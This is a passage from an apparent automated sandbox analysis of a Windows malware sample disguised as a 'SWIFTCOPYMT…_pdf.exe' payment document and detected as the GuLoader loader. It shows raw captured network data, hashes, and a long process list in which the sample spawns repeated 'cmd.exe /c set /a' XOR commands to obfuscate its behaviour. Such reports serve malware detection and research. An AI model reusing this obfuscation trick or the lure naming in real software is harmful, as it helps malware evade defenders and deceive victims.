0b 0f 27 94 d0 9f 30 13 fd 9c 12 6c 6b ae 44 46 2c 2f cf 28 27 e4 0b b8 26 62 ba cb 73 a2 df f7 61 d4 db 69 ec ec bc 0f e0 0b 9d 9a 14 46 c2 a4 ac 81 a6 1e f6 d8 62 f5 90 eb fb 12 1a a1 87 df 00 e4 cc 99 13 3c e8 0e dd 72 e9 fb 0e 2b e5 f5 4d 9f e5 44 0b 4f d6 5b 2d 4c 5b eb 03 10 a2 e3 93 93 41 0a 30 d2 c6 be fb 97 44 bf 73 a5 97 27 85 2d 08 6c de 5a 1f 4c b9 47 ab 4f 71 66 0f 5a a1 d3 be bf 03 55 40 05 a3 b7 cb c9 98 c0 03 d9 61 6f 93 4a 27 95 52 e2 6c 29 12 10 a3 2e 3f ae fc 2b d4 29 b9 99 e3 e8 24 55 61 63 fb a7 c4 04 03 13 6f bb e6 73 79 d5 89 8a 0c bf da d8 7b 9d c2 3d 67 d9 e5 37 fe 83 66 31 13 4e 44 e5 f5 e4 14 e5 f5 6c 46 4d c1 eb 5f fb 88 82 84 b9 0a a7 9e c5 87 e7 15 bd 9e 03 18 90 8f e9 ea 4e d8 00 33 be 1b 65 42 8e a9 d2 aa f5 e7 f7 12 14 29 ab 40 e6 f8 e4 f6 a7 99 0a 08 e7 83 80 f6 f9 cd 40 aa ec 76 30 13 35 12 ef 8e 04 65 d1 a7 27 70 cb 9e 0b f6 75 4c ea 98 63 49 d4 f2 a8 85 0a 63 16 5c 58 f0 1f f7 95 84 b0 4a ed 09 c9 ef ec 88 31 f6
                                    Data Ascii: t<iIcG:}Tef~+}$OZ..-ZzR?lOGi?kHOe//8A#/|;<ce"x?sR|3IigF08LVs!+!Y9f8ndtoVtZ):PWRtPdkpg7K;4~Fyd@qYi>VIvpXdn6sTeHVv!zGe5Q)1|pD<D{u`%KdZ[y!kAm{W22nAPx1T\1ICu`j)D-Ugy?bW<o9Z"c"IN|4<,T*;s_:[#0mD*L'2ZK2&S)^/!a6ofj]-+AE&-R+veK\^Kh<C"#1D4yS,;wnp&AJM}IxoS'i'ORbk=E*YrKe{LLyrYU=J'0lkDF,/('&bsaiFb<r+MDO[-L[A0Ds'-lZLGOqfZU@aoJ'Rl).?+)$Uacosy{=g7f1NDlFM_N3eB)@@v05e'puLcIc\XJ1
                                    Apr 26, 2024 13:39:21.364517927 CEST1289INData Raw: 25 32 6e 15 15 41 5c 67 31 e1 d9 74 f8 0d 82 b0 a1 a5 20 99 1f 47 b3 4a c5 08 6d 1a a4 7a 82 4a d7 2a 67 ee b0 d8 a4 2d b8 85 e0 e2 de c9 a5 bb aa 39 85 2d 25 21 29 32 99 2a 79 42 29 6b b8 37 01 44 32 fa fa db e0 1d 92 3a e3 6e bc 1f b6 a2 69 a9
                                    Data Ascii: %2nA\g1t GJmzJ*g-9-%!)2*yB)k7D2:ni:I!h,DuqVy~,*BS{RkT"j&V[p*'rVr>i],+Ym9O_[oH>Y/AjcR@`[kd-Sx$-tVc
                                    Apr 26, 2024 13:39:21.364676952 CEST1289INData Raw: 9a 79 59 2e 13 78 41 c2 ae 68 23 77 70 9b 20 65 e4 b1 32 06 07 88 cd 97 e9 90 62 b4 78 48 1c 3c df d9 74 49 ea bf 71 f4 77 a6 a3 42 3d 27 9a 98 1a 5b 76 01 2d e8 d8 79 9a 08 c7 55 8f 2f 39 89 2f fa 34 db 87 c7 44 3c e7 ca 04 bb f2 a4 99 25 ce ea
                                    Data Ascii: yY.xAh#wp e2bxH<tIqwB='[v-yU/9/4D<%[M<558 02~;X4g<n0'\1u*'4'.GeL\&N8zR)oPZxFo}.'P%*9sqqA)yPQ`
                                    Apr 26, 2024 13:39:21.364845991 CEST1289INData Raw: 78 db 3a 55 9d e2 84 37 f6 36 b3 c9 f6 eb 85 39 5c ca b8 8f a5 51 c9 74 5e ba 3e 09 df 7f aa dd 72 b2 49 b4 8b b0 1c e7 91 38 75 70 da 21 36 27 a1 06 36 14 9c d7 6f 19 5c 49 8d c7 38 62 8d 07 cb 0c ee 8a cc 41 a5 bb d1 19 b1 b1 3d 6e 3a eb 9c f7
                                    Data Ascii: x:U769\Qt^>rI8up!6'6o\I8bA=n:RqH&X|y!?$Zh_cm%Al*VN Te .cIro]cdfn"?aQ(_qo;-m(qD59_4@;gyuj
                                    Apr 26, 2024 13:39:21.364903927 CEST1289INData Raw: 15 42 35 91 84 09 12 a0 4e c9 07 85 8a 31 f6 4f 32 04 15 fd 62 2e 64 31 2d 30 55 fb 0d 82 da a1 cf 21 71 5f 44 b3 4a 06 5d e6 f6 f5 29 09 17 df 7d ec 17 8b 23 d0 77 d2 85 8a e3 36 ee a6 bb 13 d6 03 82 c4 cb 55 3d c9 a1 de a2 8f 2c b8 df 0d 9b 32
                                    Data Ascii: B5N1O2b.d1-0U!q_DJ])}#w6U=,28[Up1YDqL?[byy0_z=~*E6h5}LEtt 0rQSY<i\*/rpHo~Z9xWm1:d=3)xh8`7D~V1L
                                    Apr 26, 2024 13:39:21.364959955 CEST1289INData Raw: 7d d8 4b 02 fd cc 04 e9 d1 3a ac 7e 52 0e 27 53 75 b1 be 78 2b 14 73 6e 23 84 a8 b4 5f c4 31 da 39 fc 2e 14 f6 fc b3 15 02 a2 4a 87 ee 54 9c 7a 27 32 49 02 8c 18 7c b9 17 3a 29 6a a6 20 ec d6 35 cf cc ea b1 14 11 fb 89 6a 42 62 79 0b d4 ed ab f7
                                    Data Ascii: }K:~R'Sux+sn#_19.JTz'2I|:)j 5jBby<oy=Cv9{+0L Asq2FCgUq{0ZcOx?qE/"Oefwdj6!K /w3(H>b"('p
                                    Apr 26, 2024 13:39:21.365021944 CEST1289INData Raw: 2f 66 28 81 21 af 3a 09 c0 1a 8a 08 ad 52 38 3b 00 da 03 75 7b 6f dc f3 dd 81 e8 5e a4 d2 39 e9 35 3e 72 b0 b6 9e b8 91 38 0d a0 df b5 e9 38 be b2 8d 51 c0 66 9f b7 70 34 49 88 67 de 21 1b 50 7c 3f e2 ab d5 8f 91 b4 a6 f8 c8 b3 28 93 50 ea 99 2e
                                    Data Ascii: /f(!:R8;u{o^95>r88Qfp4Ig!P|?(P.MN#<CF@c;G^@tQ%|PW,J6Y<3k>VL%Z&Uf3<z]Qb}<!n0uq(pPEV
                                    Apr 26, 2024 13:39:21.365078926 CEST1289INData Raw: 33 86 61 59 3a 8a be f0 57 f1 2e 6f e9 28 7c fc f7 6e 7d 7b 4f c9 29 05 0b e7 ec e2 30 09 51 16 62 ea 61 65 50 8f b5 09 26 8b 7b c9 8e 72 a9 a5 c9 87 1f 47 b3 1b 2d 16 6d 1a a4 23 40 4e d7 c3 40 ee b0 d8 f5 c5 a0 85 e0 e2 87 0b a1 bb fa 76 c8 6a
                                    Data Ascii: 3aY:W.o(|n}{O)0QbaeP&{rG-m#@N@vj%q3 6rs1(T}e6QeD1`EyC[2M&:i}&T9guiF>"f=H=<EZR'w?:54*8?ITqzMr:ox6G?UF K
                                    Apr 26, 2024 13:39:21.365134001 CEST1289INData Raw: 0c d8 80 45 25 9d 67 4f cf 01 9f 26 cc 89 5c b3 8d 1b 06 f4 fc fc 1d c4 c5 d8 0a cb 13 df 37 10 b1 be 21 2b cc de 65 81 f6 1a 3b 73 a9 ba d9 b2 62 e3 01 f5 03 59 51 02 21 46 87 ee 8f d9 df 50 d9 05 02 d1 43 a7 fc 31 88 f2 69 a6 df 13 34 67 cf e7
                                    Data Ascii: E%gO&\7!+e;sbYQ!FPC1i4gpsvU/~K*fW4T3yMY0(w51>Lp3pN!O;68q4>f!bqNU-8+AE6xtKGFH4[(1
                                    Apr 26, 2024 13:39:21.365293026 CEST1289INData Raw: 90 32 27 20 41 98 c1 96 90 21 24 71 8b f3 fa 3b 66 28 bb 55 f8 35 d2 e7 2c 65 0e ad 2e 77 f8 74 24 00 75 f8 9d 23 0c 69 38 ae 7f de 99 fb 8d 2a 36 42 48 90 74 cc a1 1c 4d 0f 77 20 62 7c c4 5a 9a 51 30 db d2 bb 3e 2d 2a 57 b9 35 8d 18 42 09 36 68
                                    Data Ascii: 2' A!$q;f(U5,e.wt$u#i8*6BHtMw b|ZQ0>-*W5B6h^ BE.evNR$To-[Gg=ANLixNX7-ulL_TpfHZ)JVCyfmfXUA=?d [p)'O10|&[
                                    Apr 26, 2024 13:39:21.615818977 CEST1289INData Raw: 98 fb 41 07 93 e1 9a 2e 4e 0d 8f 34 61 86 f2 5a 77 2b 13 ad 3e e3 a0 40 8c ef 9c e9 5f 9f 7b d1 f4 50 d4 58 b7 09 f6 36 ec 2b 8b f2 a6 cd e1 b6 ea ea c2 98 6b ba 2f 8a 9c 10 e9 7d 4f 2a e9 04 bd 1c 84 98 87 c6 c0 3c f3 4b 84 7d b5 82 c2 b5 0a 4f
                                    Data Ascii: A.N4aZw+>@_{PX6+k/}O*<K}O'ik,!c_u!fZv )W%hHJ_JG;_Mf$}5RqB&"i_::pQUoE;7d+fE))=:JD,8f#7^UT>v


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:6
                                    Start time:13:38:22
                                    Start date:26/04/2024
                                    Path:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"
                                    Imagebase:0x400000
                                    File size:421'592 bytes
                                    MD5 hash:1048340BCFAE30DF032C161AC52F8F0E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000006.00000002.134274135976.0000000000863000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000006.00000002.134274135976.000000000081E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.134275655794.00000000085F6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "250^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:8
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:9
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "244^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:10
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:11
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "227^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:12
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:13
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "255^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:14
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:15
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "244^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:16
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:17
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "253^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:18
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:19
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "130^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:20
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:21
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "131^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:22
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:23
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "139^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:24
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:25
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "139^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:26
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:27
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "242^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:28
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:29
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "195^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:30
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:31
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "212^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:32
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:33
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "208^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:34
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:35
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "197^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:36
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:37
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "212^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:38
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:39
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "247^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:40
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:41
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd.exe /c set /a "216^177"
                                    Imagebase:0x7ff7a6e80000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:42
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:43
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "221^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:44
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:45
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "212^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:46
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:47
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "240^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:48
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:49
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "153^177"
